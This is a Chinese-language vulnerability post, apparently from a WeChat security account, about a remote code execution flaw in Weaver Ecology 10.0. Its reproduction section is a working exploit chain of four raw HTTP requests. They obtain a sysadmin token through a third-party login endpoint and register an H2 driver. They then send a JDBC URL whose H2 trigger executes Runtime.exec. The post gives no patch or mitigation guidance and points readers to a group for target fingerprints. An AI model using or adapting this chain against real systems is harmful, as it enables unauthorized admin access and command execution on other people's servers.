点击上方蓝字关注我们
漏洞简介
泛微Ecology-10.0存在远程代码执行漏洞,该漏洞通过Ecology-10.0获取管理员访问令牌,然后通过JDBC反序列化和实现RCE,系统必须依赖于 H2 数据库。
网络测绘
获取指纹请加入星落安全交流群,入群方式在文章底部!
漏洞复现
POST /papi/passport/rest/appThirdLogin HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Content-Type: application/x-www-form-urlencodedContent-Length: 52username=sysadmin&service=1&ip=1&loginType=third
POST /papi/passport/login/generateEteamsId HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Content-Type: application/x-www-form-urlencodedContent-Length: 57stTicket=ST-101-evSBqSjCgdFlybBozZWR-http://127.0.0.1
POST /api/bs/iaauthclient/base/save HTTP/1.1Host:Content-Length: 86User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Content-Type: application/jsonAccept: */*Origin: http://ipReferer: http://ip/Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeETEAMSID: THIRD_def423a1574e66bbdb29bc647cd{"isUse":1,"auth_type":"custom","iaAuthclientCustomDTO":{"ruleClass":"org.h2.Driver"}}
POST /api/dw/connSetting/testConnByBasePassword HTTP/1.1Host:Content-Length: 199User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Content-Type: application/jsonAccept: */*Origin: http://127.0.0.1Referer: http://127.0.0.1Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeETEAMSID: THIRD_7a045fd9ebc4540e9f9e6688d{"dbType":"mysql5","dbUrl":"jdbc:h2:mem:test;MODE=MSSQLServer;init = CREATE TRIGGER hhhh BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$ //javascript\njava.lang.Runtime.getRuntime().exec(\"id\")$$"}
